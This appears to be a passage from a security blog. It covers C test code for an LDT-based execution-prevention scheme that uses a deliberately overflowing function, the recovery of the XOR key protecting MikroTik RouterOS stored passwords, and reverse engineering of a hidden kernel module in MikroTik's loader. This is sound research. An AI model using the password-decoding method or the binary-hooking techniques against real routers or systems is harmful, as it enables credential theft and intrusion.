                (unsigned long int) (base), // base_address
                0x5ffff, // limit, 1.5G or so :p
                1, // seg_32bit
                type, // contents
                1, // read_exec_only
                1, // limit_in_pages
                0, // seg_not_present
                1 // usable
        };
        return modify_ldt(1, &ldt_entry, sizeof(struct modify_ldt_ldt_s)) == 0;
}

int do_exit()
{
        exit(EXIT_SUCCESS);
}

void vulnerable()
{
        int j[1];
        int i;
        char code[] = "\xcc\xcc\xcc\xcc";
#ifdef HEAP
        int addr = strdup(code);
#else
        int addr = &code;
#endif
        //char *where;
        //__asm__("int3;");
        for(i = 0; i < 10; i++) j[i] = (unsigned int)(addr);
}

unsigned char *old_stack;
int old_stack_len;

void duplicate_code_mappings()
{
        // taken from drifter level 11 code, but modified.
        FILE *f;
        int hi, low;
        char flags[5];
        int wot;
        int major, minor;
        int size;
        char remainder[1024];
        int ret;
        unsigned char *new;

        f = fopen("/proc/self/maps", "r");

        while(8 == (ret = fscanf(f, "%08x-%08x %[^ \n] %08x %02x:%02x %08x%[^\n]", &low, &hi, flags, &wot, &major, &minor, &size, remainder))) {
                if((low & 0x60000000) == 0x60000000) continue;

                size = hi - low;
                /*
                 * size = hi - low;
                 * printf("--> %08x-%d\n", low, size);
                printf("--> %08x-%08x %s %d %d:%d %d %s\n", low, hi, flags, wot, major, minor, size, remainder);
                 */

                // r-xp
                if(flags[1] == '-' && flags[2] == 'x') {
                        printf("--> Duplicating 0x%08x, %d bytes long\n", low, size);

                        new = mmap(low+0x60000000, size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
                        if(new == MAP_FAILED) {
                                printf("Unable to map code duplicate: %s\n", strerror(errno));
                                exit(EXIT_FAILURE);
                        }
                        memcpy(new, low, size);
                        mprotect(new, size, PROT_READ|PROT_EXEC);
                }
                old_stack = low;
                old_stack_len = size;
        }
        fclose(f);

        //exit(EXIT_FAILURE);
}


#define STKSIZ (4096 * 32)
// more code from drifter level11.. so I'm lazy :P

unsigned char *allocate_stack()
{
        int found;
        int address;
        short int shift;
        unsigned char *stack_ptr;
        int urand_fd;

        urand_fd = open("/dev/urandom", O_RDONLY);

        found = 0;
        while(!found) {
                if(read(urand_fd, &address, 4) != 4) {
                        printf("Read failure on /dev/urandom: %s\n", strerror(errno));
                        exit(EXIT_FAILURE);
                }

                if(read(urand_fd, &shift, 2) != 2) {
                        printf("Read failure on /dev/urandom: %s\n", strerror(errno));
                        exit(EXIT_FAILURE);
                }

                shift &= 4088; // (page_size - 1) with the low 3 bits cleared, to align stack

#if 1
                address &= 0x5f7fffff; // remove everything except for last 8M of address space
                //address |= TOOBIG;
#endif
                address &= ~4095;       // clear page addr

                stack_ptr = mmap(address, STKSIZ, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
                if(stack_ptr != MAP_FAILED) found = 1;

        }

        close(urand_fd);

        stack_ptr = (unsigned int)(stack_ptr) + (STKSIZ) - shift;
        memset(stack_ptr, 0xcc, shift);

        stack_ptr--;
        return stack_ptr;
}

void do_vulnerable()
{
        munmap(old_stack, old_stack_len);
        printf("Hello from do_vulnerable\n");
        vulnerable();
        do_exit();
}

int main(int argc, char **argv)
{
        short int seg;
        unsigned char *stack;

        if(do_ldt(0, 0x60000000, MODIFY_LDT_CONTENTS_CODE) == 0) {
                printf("Failed to modify ldt\n");
                exit(EXIT_FAILURE);
        }
        seg = 7;

        duplicate_code_mappings();
        stack = allocate_stack();

        printf("--> Will unmap old stack starting @ 0x%08x\n", old_stack);
        system("cat /proc/$PPID/maps");

        printf("Returning to do_vulnerable\n");

        __asm__ volatile("movl %0, %%esp;\
                        movl %%esp, %%ebp;\
                        pushl %1;\
                        pushw %2;\
                        pushl %3;\
                        lret"
                        :
                        : "m"(stack), "m" (do_exit), "r" (seg), "r" ((unsigned int)(do_vulnerable))
                        );

}

The above was compiled with:

diet gcc -fno-pie -fno-stack-protector ldt_test.c -o ldt_test

The above code creates a new stack mapping underneath the cutoff point (the original stack is mapped somewhere around 0xbfff0000, which is above it). In addition, it duplicates the code layout by scanning /proc/self/maps for mappings that are marked executable and NOT writable.
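The maps scan described above can be sketched in Python. This is only an illustration of the filtering rule (executable, not writable), not the C code from the test program; the function name is made up for this example, the sample lines are taken from the test program's own maps output, and the 0x60000000 offset is the one used in the mmap() call in the listing.

```python
def executable_readonly_mappings(maps_text):
    """Return (start, size) for each mapping that is executable and not writable."""
    found = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        addr_range, perms = fields[0], fields[1]
        if "x" in perms and "w" not in perms:
            low, high = (int(part, 16) for part in addr_range.split("-"))
            found.append((low, high - low))
    return found


# Sample lines in /proc/<pid>/maps format, copied from the test program's output.
SAMPLE_MAPS = """\
08048000-0804e000 r-xp 00000000 08:01 50639      /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50639      /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
bfffc000-c0000000 rwxp ffffd000 00:00 0
"""

DUPLICATE_OFFSET = 0x60000000  # offset added to each mapping by the C code

for start, size in executable_readonly_mappings(SAMPLE_MAPS):
    print("--> Duplicating 0x%08x, %d bytes long (copy at 0x%08x)"
          % (start, size, start + DUPLICATE_OFFSET))
```

Only the r-xp text mapping passes the filter; the rwxp mappings are skipped because they are writable.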

The vulnerable() function simulates a stack overflow, pointing to the int3 instruction. Optionally, it can be compiled with -DHEAP, and it will simulate a heap return address, rather than a stack return address.

Watching it catch heap execution attempts:

GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfffc000
00110000-00111000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50639      /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50639      /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
0d2a4000-0d2c4000 rw-p 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfffc000-c0000000 rwxp ffffd000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable

Program received signal SIGSEGV, Segmentation fault.
0x00111008 in ?? ()
(gdb) x/4i $eip
0x111008:       int3
0x111009:       int3
0x11100a:       int3
0x11100b:       int3

And stack execution attempts:

GNU gdb 6.7.1
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-pc-linux-gnu"...
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) r
Starting program: /root/drifter/ldt/ldt_wot
--> Duplicating 0x08048000, 24576 bytes long
--> Will unmap old stack starting @ 0xbfff4000
00110000-00111000 rw-p 00000000 00:00 0
063c3000-063e3000 rw-p 00000000 00:00 0
08048000-0804e000 r-xp 00000000 08:01 50635      /root/drifter/ldt/ldt_wot
0804e000-08050000 rw-p 00005000 08:01 50635      /root/drifter/ldt/ldt_wot
08050000-08051000 rwxp 00000000 00:00 0
68048000-6804e000 r-xp 00000000 00:00 0
bfff4000-c0000000 rwxp ffff5000 00:00 0
Returning to do_vulnerable
Hello from do_vulnerable

Program received signal SIGSEGV, Segmentation fault.
0x063e25b1 in ?? ()
(gdb) x/4i $eip
0x63e25b1:      int3
0x63e25b2:      int3
0x63e25b3:      int3
0x63e25b4:      int3

Implementing it properly

This idea could be implemented fairly easily in the ELF loader (ld.so, not the kernel), provided it laid out memory correctly and remapped the stack to a lower address. It would also have to hook calls such as mmap() and duplicate the resulting mappings where possible/applicable.

Anonymous memory could possibly be handled via making it disk backed, and mapping twice from that.

Rather than using memcpy as the test code does, a proper implementation should parse /proc/<pid>/maps and mmap() shared libraries from their backing files.

Dynamically generated code could be handled by marking segments non-writable when an attempt is made to execute them. On attempts to write there again, the segment would be unmapped from the executable region and marked writable again. Self modifying code would be handled via this mechanism, albeit slowly.

Weaknesses

Other uses for modify_ldt() syscall

MikroTik Router Security Analysis: Weak password storage / encryption

(added 3/1/2008)

On the 3rd of January, manio [at] skyboo [dot] net e-mailed me asking for some hints / tips / advice about how the passwords are stored in the MikroTik Router OS image. (To his credit, he said he realised it was XOR based pretty much right after he hit send on the mail). The user/password information is stored in /nova/store/user.dat. His homepage is http://manio.skyboo.net/mikrotik/.

According to him, the following passwords had the following encrypted text:

zero length pw  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0               78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
aaa             29 DE BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
ala             29 D3 BF 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01
0000            48 8F EE 36 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01

Initially, we can note that :

This made me think it was something trivial such as an XOR based scheme.

If it is, we can work out what the first XOR byte is by:

>>> hex(0x78 ^ ord('0'))
'0x48'

This works because XOR is its own inverse: if cipher = plain ^ key, then key = cipher ^ plain.

Continuing with the assumption that the second character is also XORed, we take the suspected XOR byte of 0xbf (the second byte of the entry for the password 0) and XOR it against the ASCII values of a and l:

>>> hex(0xbf ^ ord('a'))
'0xde'
>>> hex(0xbf ^ ord('l'))
'0xd3'

As we can see, the returned bytes are the same as the second bytes from the "hash" from aaa and ala respectively.

Since we now know the "encryption" key, we can write a decoder trivially. (As a side note, I like Python's doctest module :) )

$ python mikrotik_password.py 29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01
aaa
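The original mikrotik_password.py is not reproduced here, so what follows is only a minimal sketch of how such a decoder could work. It assumes the stored value is the password padded with NUL bytes and XORed position by position with a fixed key, and it recovers that key from the known entry for the password 0. The helper names are invented for this example.

```python
def parse_hex(text):
    """Turn a string like '29 de bf' into bytes."""
    return bytes(int(token, 16) for token in text.split())


def xor_bytes(left, right):
    """XOR two byte strings position by position."""
    return bytes(x ^ y for x, y in zip(left, right))


# Stored form of the one character password "0", as listed earlier.
KNOWN_CIPHER = parse_hex("78 BF DE 06 49 5A 0E 2D 09 D5 FB 27 B1 44 EC 93 01")
# Assumption: the plaintext is padded with NUL bytes up to the stored length.
KNOWN_PLAIN = b"0".ljust(len(KNOWN_CIPHER), b"\x00")

# key = cipher ^ plain, because XOR is its own inverse.
KEY = xor_bytes(KNOWN_CIPHER, KNOWN_PLAIN)


def decode_password(stored_hex):
    """Undo the XOR and strip the assumed NUL padding."""
    plain = xor_bytes(parse_hex(stored_hex), KEY)
    return plain.rstrip(b"\x00").decode("ascii")


print(decode_password("29 de bf 06 49 5a 0e 2d 09 d5 fb 27 b1 44 ec 93 01"))
```

Fed the same bytes as the command line above, this prints aaa. Whether the trailing 01 byte is really part of the key or some kind of flag is not known; the sketch simply treats it like every other position.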

The password decoder can be found here for those who care.

I do not know if the encryption key changes on different releases of RouterOS, or if it is dependent upon the license key or anything like that - this was coded with the information manio (lowercased upon his request) provided to me. manio said that he would investigate this when he gets a chance.

Ruxcon 2008

(added 20/11/2007)

Despite what many have thought, ruxcon will be making a comeback in 2008 :) Not too much has been planned at the moment, but by the looks of it, things are back on track. Somewhat recently, a ddos kiddie from South Australia packeted the box, causing the hosting provider to null route the ip… however that issue was sorted out.

I will be attempting to do a talk at ruxcon, not sure exactly what, but probably regarding hardened linux, and covering such things as PaX / grsecurity and other assorted things.

Depending on how things are going, I will probably set up a capture the flag game as well.

If you are interested in speaking at Ruxcon 2008, drop a note to chris@ruxcon.org.au indicating your interest.

Hope to see you all there :D

MikroTik Router Security Analysis: Uncovering a hidden kernel module in a binary

(started 28/8/2007, added 11/10/2007)

The MikroTik Wireless Router is an embedded Linux wireless router, offering functionality such as bandwidth management, firewalling, a VPN server/client, and various other things. As with all embedded Linux based software, it is interesting to pull it apart :)

It has been around for a while now… when I analysed the software and pulled it apart a couple of years ago, it had drivers/firmware to turn standard Orinoco wireless cards into an Access Point (which, as far as I know, wasn't possible otherwise, at least not when I was looking at it.)

For the purposes of this article, I am looking at mikrotik-2.9.46.iso (MD5sum: 65aa908dd748ccf72ad9f588613dfe31, SHA1sum: 5e5ed13498db8d9745a701f75e58da3ef6701e58). For the most part, I have used QEMU to emulate the hardware/software environment to install it on. This has several advantages, such as being able to edit the "disk" it's using easily, amongst other things.

Performing active analysis of MikroTik router components

To perform more active analysis of the MikroTik components, we could copy the applicable binaries and associated libraries to another linux platform. This would allow us to strace the binary, debug it (which is incredibly useful for exploit development), and monitor the activities it performs in general. Furthermore, we can copy the kernel and applicable modules to perform further analysis on them, and to allow the environment to be replicated a lot better.

The analysis environment / setup

For this article, I have done a basic network install of Debian 4rc1. After performing the installation and installing a bunch of generic tools (strace/gdb/gcc/ltrace/openssh-server/nasm/etc), I then extracted the Mikrotik kernel and modules, and put the applicable files into their place.

[box] # wget http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
--08:58:00-- http://felinemenace.org/~andrewg/MikroTik_Router_Security_Analysis_Part1/MikroTik-2.9.46-kernel-initrd.tgz
           => `MikroTik-2.9.46-kernel-initrd.tgz'
Resolving felinemenace.org... 69.55.233.10
Connecting to felinemenace.org|69.55.233.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,832,960 (1.7M) [application/x-gzip]

100%[====================================>] 1,832,960    327.68K/s    ETA 00:00

08:58:06 (330.42 KB/s) - `MikroTik-2.9.46-kernel-initrd.tgz' saved [1832960/1832960]
[box] # tar xzf MikroTik-2.9.46-kernel-initrd.tgz
[box] # mv lib/modules/2.4.31/ /lib/modules/2.4.31
[box] # mv boot/vmlinuz /boot/vmlinuz-2.4.31
[box] # cd /boot/grub/
[box] # cat >>menu.lst <<_EOF_
> title MikroTik 2.4.31 / 2.9.46
> root            (hd0,0)
> kernel /boot/vmlinuz-2.4.31
>
> _EOF_
[box] # sync ; reboot

While the QEMU image was rebooting, I wondered if it would work at all, given the differences between 2.6 and 2.4 kernels. First though, it appeared I would have to experiment with initrd images to load the applicable drivers, and generally mess around, as booting it displayed:

  Booting 'MikroTik 2.4.31 / 2.9.46'

root                    (hd0,0)
 Filesystem type is ext2fs, partition type is 0x83
kernel /boot/vmlinuz-2.4.31
    [Linux-bzImage, setup=0x1400, size=0xa044d]

Uncompressing Linux... Ok, booting the kernel.
Kernel panic: VFS: Unable to mount root fs on 09:00

Booting back into the standard Debian kernel:

[box] # cd /boot/
[box] # cp /root/boot/initrd.rgz mikro-initrd.rgz
[box] # cd grub/
[box] # echo initrd /boot/mikro-initrd.rgz >>menu.lst
[box] # sync ; reboot

Unfortunately, this gives a similar error message to before. We know from previously mounting the MikroTik root filesystem that it was ext3, but we can attempt to verify which filesystems the kernel supports. Looking over the original find output for the kernel modules, we don't see any filesystem modules for the default ext2 filesystem.

We can verify the filesystems supported by analysing the vmlinuz file. To summarise, this file contains some bootup code to get the machine into a decent state, a gzip decompression routine, and a heap of compressed data. The information we're interested in is in the compressed data, so we have to decompress it. As it's not a standard gzip file, we can't just run gunzip on it and be done with it; we need to extract the compressed data first.

Fortunately, this can be done rather easily because of the gzip header / magic bytes, which allow us to find suitable offsets to attempt decompression. The gzip magic bytes can be found by doing:

[box] # cd /tmp
[box] # cp /etc/passwd .
[box] # gzip passwd
[box] # xxd passwd.gz  | head
0000000: 1f8b 0808 2061 d346 0003 7061 7373 7764  .... a.F..passwd
0000010: 0065 93c1 6ec2 300c 86ef 3c05 c74d 0285  .e..n.0...<..M..
0000020: 5260 90e3 3469 9771 d99e c06d 4289 d626  R`..4i.q...mB..&
0000030: 55d2 5278 fbd9 71a0 4593 adc8 7ffc 2536  U.Rx..q.E.....%6
0000040: 0ef5 ce75 f22a 5768 9e42 c16b 61ac 2820  ...u.*Wh.B.ka.(
0000050: 9c67 0a74 e32c 1219 5a12 a20f 5e04 4498  .g.t.,..Z...^.D.
0000060: 438a e2ab 5ca3 dd77 1fa9 700b 98ca d128  C...\..w..p....(
0000070: 124a 5f26 295b 626e 2377 db6d be91 514e  .J_&)[bn#w.m..QN
0000080: cea2 9c55 d068 3abf 95bb 9564 11ab a730  ...U.h:....d...0
0000090: 5dd4 0095 dfc9 6c2d 2914 17f0 a284 f2ac  ].....l-).......

For the purpose at hand, we'll use 0x1f8b as our marker.

[box] # xxd /boot/vmlinuz-2.4.31 | egrep "\b1f8b|1f\b \b8b" | head -n 5
00049a0: a9d0 0900 1f8b 0800 b533 bc46 0203 ec5d  .........3.F...]
0004f20: 3613 e31f 8b6d a730 ef6f 1078 d415 4401  6....m.0.o.x..D.
001c6c0: 0a1f 8bab 69a2 a7e5 533b 4d60 764f 93bc  ....i...S;M`vO..
00381b0: c3ba d727 7964 631f 8baf 810c 2704 206f  ...'ydc.....'. o
003fdf0: 972f d2d6 d50e 5d37 180b 771f 8bc5 b43d  ./....]7..w....=

To extract the compressed data from the vmlinuz-2.4.31 file, dd does the trick easily. We'll start from our first match and work our way down.

[box] # dd if=/boot/vmlinuz-2.4.31 of=vmlinuz.gz bs=1 skip=$((0x49a4))
662093+0 records in
662093+0 records out
662093 bytes (662 kB) copied, 16.0954 seconds, 41.1 kB/s
[box] # file vmlinuz.gz
vmlinuz.gz: gzip compressed data, from Unix, last modified: Fri Aug 10
19:45:25 2007, max compression
[box] # gunzip vmlinuz.gz
[box] # strings -a vmlinuz
... skip ...
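The xxd / dd / gunzip steps above can also be rolled into one pass. The following is a rough sketch rather than the method used here: it searches for the magic bytes plus the deflate method byte (0x08, an extra assumption added to cut down on false positives) and tries to decompress from each hit, ignoring whatever trails the compressed stream. The function name and the file path in the usage note are made up for illustration.

```python
import zlib

# Magic bytes 0x1f 0x8b, followed by 0x08 (the deflate compression method).
GZIP_MAGIC = b"\x1f\x8b\x08"


def extract_gzip_streams(blob):
    """Yield (offset, decompressed_bytes) for each complete gzip stream in blob."""
    pos = blob.find(GZIP_MAGIC)
    while pos != -1:
        # 16 + MAX_WBITS tells zlib to expect a gzip header and trailer.
        decomp = zlib.decompressobj(16 + zlib.MAX_WBITS)
        try:
            data = decomp.decompress(blob[pos:])
            if decomp.eof:  # only accept streams that decompress to the end
                yield pos, data
        except zlib.error:
            pass  # false positive, such as the 1f 8b hits further down the file
        pos = blob.find(GZIP_MAGIC, pos + 1)
```

Usage would be along the lines of reading /boot/vmlinuz-2.4.31 in binary mode, passing the bytes to extract_gzip_streams(), and writing out the first result for strings to chew on.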

After seeing various ext2 related things, I realised it was probably a problem with something else. Reviewing grub's menu.lst, it becomes obvious:

title           Debian GNU/Linux, kernel 2.6.18-5-686
root            (hd0,0)
kernel          /boot/vmlinuz-2.6.18-5-686 root=/dev/hda1 ro
initrd          /boot/initrd.img-2.6.18-5-686
savedefault
.... skip...
title MikroTik 2.4.31 / 2.9.46
root            (hd0,0)
kernel /boot/vmlinuz-2.4.31

initrd /boot/mikro-initrd.rgz

The kernel line for the MikroTik entry is missing some parameters. After fixing the applicable line (kernel /boot/vmlinuz-2.4.31 root=/dev/hda1 ro single) and rebooting, it works. At least the decompressing of the kernel image will come in useful for further investigation work. One last thing to note is that the Debian modutils package is required to work with 2.4 kernels.

Anyways, moving on, the debian image boots up and works reasonably with their kernel / modules. I had to load the ne2k-pci module manually (via modprobe ne2k-pci) to bring up networking under QEMU.

Another issue I had under the debian/mikrotik hybrid I created, was that the MikroTik kernel does not have AF_UNIX/AF_FILE support built-in, so useful programs like sysklogd and sshd would not run by default… However, it ships this as a module, so modprobe unix took care of this issue.

In order to run the MikroTik binaries (/nova/bin/), I needed to copy various files. I copied /nova/ over, and made a directory called /lib_mikro/ where I could copy the various library files that resided in the /lib directory on the MikroTik installation.

In order to use these libraries from a non-standard directory location, the environment variable LD_LIBRARY_PATH can be set. This way only the applicable MikroTik binaries are run with the MikroTik library versions.

Examining the fileman binary

Doing some preliminary analysis on the fileman binary shows that it appears to be expecting a network file descriptor on fd 3.

[box] $ LD_LIBRARY_PATH=/lib_mikro/ strace -f ./fileman
execve("./fileman", ["./fileman"], [/* 14 vars */]) = 0
uname({sys="Linux", node="debian", ...}) = 0
brk(0)                                  = 0x805861c
...
rt_sigaction(SIGFPE, {0x4002c8ca, [], SA_RESTORER|SA_RESTART|SA_SIGINFO,
0x4009d4c0}, NULL, 8) = 0
getsockname(3, 0xbffffd18, [110])       = -1 EBADF (Bad file descriptor)
socket(PF_FILE, SOCK_STREAM, 0)         = -1 EAFNOSUPPORT (Address family not
supported by protocol)
exit_group(1)                           = ?
Process 2147 detached

Unfortunately, Debian's version of bash does not have /dev/tcp/ support, so it's not as easy as running nc -l 12121 on one terminal, and … ./fileman 3</dev/tcp/blah/ on another.

After quickly writing some code to do what's needed, we can run fileman (and probably others). It's available here if you would like it. Usage is simple, python fd3.py <program to execute> <arguments for program>. Note that the first argument you specify for the program is argv[0] - not argv[1]. An example of a command line would be python fd3.py /usr/bin/strace strace -f /path/to/program.
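The fd3.py script itself is not reproduced here, so the following is a hypothetical stand-in that follows the same command line convention. It is a sketch under a few assumptions: it listens on a hard coded TCP port (31313, chosen arbitrarily for this example), accepts a single connection, makes that connection available as file descriptor 3, and then executes the requested program. The helper name move_to_fd is made up.

```python
import os
import socket
import sys

LISTEN_PORT = 31313  # assumption: any free TCP port will do


def move_to_fd(sock, target_fd=3):
    """Make sock's connection available on target_fd and keep it open across exec."""
    if sock.fileno() != target_fd:
        os.dup2(sock.fileno(), target_fd)
    # Python creates descriptors close-on-exec by default, so undo that explicitly.
    os.set_inheritable(target_fd, True)


def main(argv):
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("", LISTEN_PORT))
    listener.listen(1)
    conn, _peer = listener.accept()  # blocks until something connects
    listener.close()
    move_to_fd(conn)
    # argv[1] is the program to execute, argv[2] becomes its argv[0].
    os.execv(argv[1], argv[2:])


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        main(sys.argv)
    else:
        print("usage: %s <program> <argv0> [args...]" % sys.argv[0], file=sys.stderr)
```

The explicit set_inheritable() call matters for the case where the accepted socket already happens to be fd 3, since dup2() onto the same descriptor would not clear the close-on-exec flag.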

Another issue appeared when trying to run fileman with a valid file descriptor on fd 3: it wanted to connect to a UNIX domain socket at /tmp/novasock:

[box] $ LD_LIBRARY_PATH=/lib_mikro fd3 `which strace` strace -f ./fileman
getsockname(3, {sa_family=AF_INET, sin_port=htons(31313), sin_addr=inet_addr("192.168.254.3")}, [16]) = 0
socket(PF_FILE, SOCK_STREAM, 0)         = 4
connect(4, {sa_family=AF_FILE, path="/tmp/novasock"}, 110) = -1 ENOENT (No such file or directory)
close(4)                                = 0
exit_group(1)                           = ?

Looking for /tmp/novasock, we find that the loader binary seems to have what we're after:

[box] $ strings -f * | grep novasock
loader: /tmp/novasock

Analysing kernel module and userland interaction

Performing some initial analysis via strace on loader reveals an interesting / startling behaviour in loader:

[box] $ LD_LIBRARY_PATH=/lib_mikro strace -f ./loader
...
[pid  2361] create_module("qwink", 1430) = 0xc8831000
[pid  2361] init_module(0x80553fc, 134587376, umovestr: Input/output error
0xa7) = 0
[pid  2361] delete_module("qwink")      = 0
...

The interesting thing about this particular piece of code is that it loads a Linux kernel module (LKM) and then immediately removes it. This is particularly interesting, as it would appear to be a kernel module that's meant to stay out of sight.

To dump the module, we could hook init_module to perform our required actions, however, first we have to verify it's easily possible:

[box] $ objdump -R loader  | grep -i module
[box] $

This is interesting, as it appears not to be importing the various module library calls. Performing some more analysis:

[box] $ objdump -dtrs loader | grep module
...
 804fb69:       e8 3a 42 00 00          call   8053da8 <delete_module+0x336>
08053a20 <create_module>:
 8053a36:       76 0c                   jbe    8053a44 <create_module+0x24>
08053a49 <init_module>:
...

The interesting thing about this output is the lines where the function names are surrounded by angle brackets; this indicates that those functions exist in the .text of loader:

08053a49 <init_module>:
 8053a49:       55                      push   %ebp
 8053a4a:       b8 80 00 00 00          mov    $0x80,%eax
 8053a4f:       89 e5                   mov    %esp,%ebp
 8053a51:       53                      push   %ebx
 8053a52:       8b 4d 0c                mov    0xc(%ebp),%ecx
 8053a55:       8b 5d 08                mov    0x8(%ebp),%ebx
 8053a58:       cd 80                   int    $0x80
 8053a5a:       83 f8 82                cmp    $0xffffff82,%eax
 8053a5d:       89 c3                   mov    %eax,%ebx
 8053a5f:       76 0c                   jbe    8053a6d <init_module+0x24>
 8053a61:       f7 db                   neg    %ebx
 8053a63:       e8 54 70 ff ff          call   804aabc <__errno_location@plt>
 8053a68:       89 18                   mov    %ebx,(%eax)
 8053a6a:       83 cb ff                or     $0xffffffff,%ebx
 8053a6d:       89 d8                   mov    %ebx,%eax
 8053a6f:       5b                      pop    %ebx
 8053a70:       5d                      pop    %ebp
 8053a71:       c3                      ret
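The tail of the stub above (cmp / jbe / neg / or) is the usual i386 way of turning a raw kernel return value into a C style return value plus errno. A small model of that logic, written as a sketch with invented names, shows why the create_module return value seen in strace (0xc8831000) counts as success even though it would be negative as a signed integer:

```python
ERROR_BOUNDARY = 0xffffff82  # the constant compared against %eax in the stub


def stub_return(raw_eax):
    """Model the stub's tail: returns (return_value, errno_or_None)."""
    raw = raw_eax & 0xffffffff
    if raw <= ERROR_BOUNDARY:          # jbe: unsigned compare, treated as success
        return raw, None
    errno_value = (-raw) & 0xffffffff  # neg %ebx
    return -1, errno_value             # or $0xffffffff,%ebx sets the result to -1


print(stub_return(0xc8831000))  # kernel address returned by create_module
print(stub_return(0xfffffffe))  # raw value for -2, which is ENOENT
```

Only raw values from 0xffffff83 up to 0xffffffff (that is, -125 to -1) are treated as errors; everything else is handed back untouched.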

This appears to be a standard implementation of the _syscallX() macros in asm/unistd.h. While we're staring at objdump -d output, we may as well look at where this code is (statically) being called from:

 8053ea6:       ff 75 dc                pushl  0xffffffdc(%ebp)
 8053ea9:       ff 35 20 64 05 08       pushl  0x8056420
 8053eaf:       e8 95 fb ff ff          call   8053a49 <init_module>

At 0x8053ea9 it pushes the contents of a static variable (at 0x8056420), so the address itself does not show up in our strace output. Having a brief look at where that variable is used beforehand:

[box] $ objdump -dtrsRS loader | grep -C 2 8056420
...
 8053db4:       83 ec 18                sub    $0x18,%esp
 8053db7:       c7 45 f0 00 00 00 00    movl   $0x0,0xfffffff0(%ebp)
 8053dbe:       8b 3d 20 64 05 08       mov    0x8056420,%edi
 8053dc4:       ba 10 00 00 00          mov    $0x10,%edx
 8053dc9:       f2 ae                   repnz scas %es:(%edi),%al
--
 8053e19:       e8 3e 70 ff ff          call   804ae5c <memcpy@plt>
 8053e1e:       53                      push   %ebx
 8053e1f:       ff 35 20 64 05 08       pushl  0x8056420
 8053e25:       56                      push   %esi
 8053e26:       e8 31 70 ff ff          call   804ae5c <memcpy@plt>
 8053e2b:       ff 75 ec                pushl  0xffffffec(%ebp)
 8053e2e:       ff 35 20 64 05 08       pushl  0x8056420
 8053e34:       e8 e7 fb ff ff          call   8053a20 <create_module>
 8053e39:       83 c4 24                add    $0x24,%esp
--
 8053ea1:       e8 57 fd ff ff          call   8053bfd <delete_module+0x18b>
 8053ea6:       ff 75 dc                pushl  0xffffffdc(%ebp)
 8053ea9:       ff 35 20 64 05 08       pushl  0x8056420
 8053eaf:       e8 95 fb ff ff          call   8053a49 <init_module>
 8053eb4:       83 c4 10                add    $0x10,%esp
--
 8053ee0:       83 c4 0c                add    $0xc,%esp
 8053ee3:       8b 55 f0                mov    0xfffffff0(%ebp),%edx
 8053ee6:       ff 35 20 64 05 08       pushl  0x8056420
 8053eec:       39 c2                   cmp    %eax,%edx
 8053eee:       0f 94 c3                sete   %bl

So, it appears it's used a bit to set it up. Being the somewhat lazy type, I figured it would be easy enough to write a dynamic library to modify the .text segment to insert a hook. The mechanisms used for this are discussed in a paper I wrote, available here.

The aim of the hook code is simple: to dump the applicable information sent to init_module. It also appears that the init_module function declaration changes between 2.4 and 2.6 kernel versions:

2.4:
 * int init_module(const char *name, struct module *image);
2.6:
 * long sys_init_module(void *umod, unsigned long len, const char *uargs);

The strace output above decodes the arguments using the 2.6 prototype, not the 2.4 one. After locating a suitable 2.4 init_module man page, we see that the second parameter is a pointer to a structure:

The module image begins with a module structure and is followed by code and data as appropriate.  The module structure is defined as follows:

struct module {
  unsigned long         size_of_struct;
  struct module        *next;
  const char           *name;
  unsigned long         size;
  long                  usecount;
  unsigned long         flags;
  unsigned int          nsyms;
  unsigned int          ndeps;
  struct module_symbol *syms;
  struct module_ref    *deps;
  struct module_ref    *refs;
  int                 (*init)(void);
  void                (*cleanup)(void);
  const struct exception_table_entry *ex_table_start;
  const struct exception_table_entry *ex_table_end;
#ifdef __alpha__
  unsigned long gp;
#endif
};

At least the required information is available to make it easier. After writing the required code (which is available here) and running our hooking library, we get:

[box] $ LD_LIBRARY_PATH=/lib_mikro LD_PRELOAD=/tmp/hook-loader.so ./loader
forked
creating loader
--> In an int3 handler
--> Create module return address is 0xc8831000
--> In an int3 handler
--> working our magic for qwink

Matching the dumped header information with the struct module output, we get:

[box] $ xxd /tmp/module_header
0000000: 3c00 0000 0000 0000 9015 83c8 9605 0000  <...............
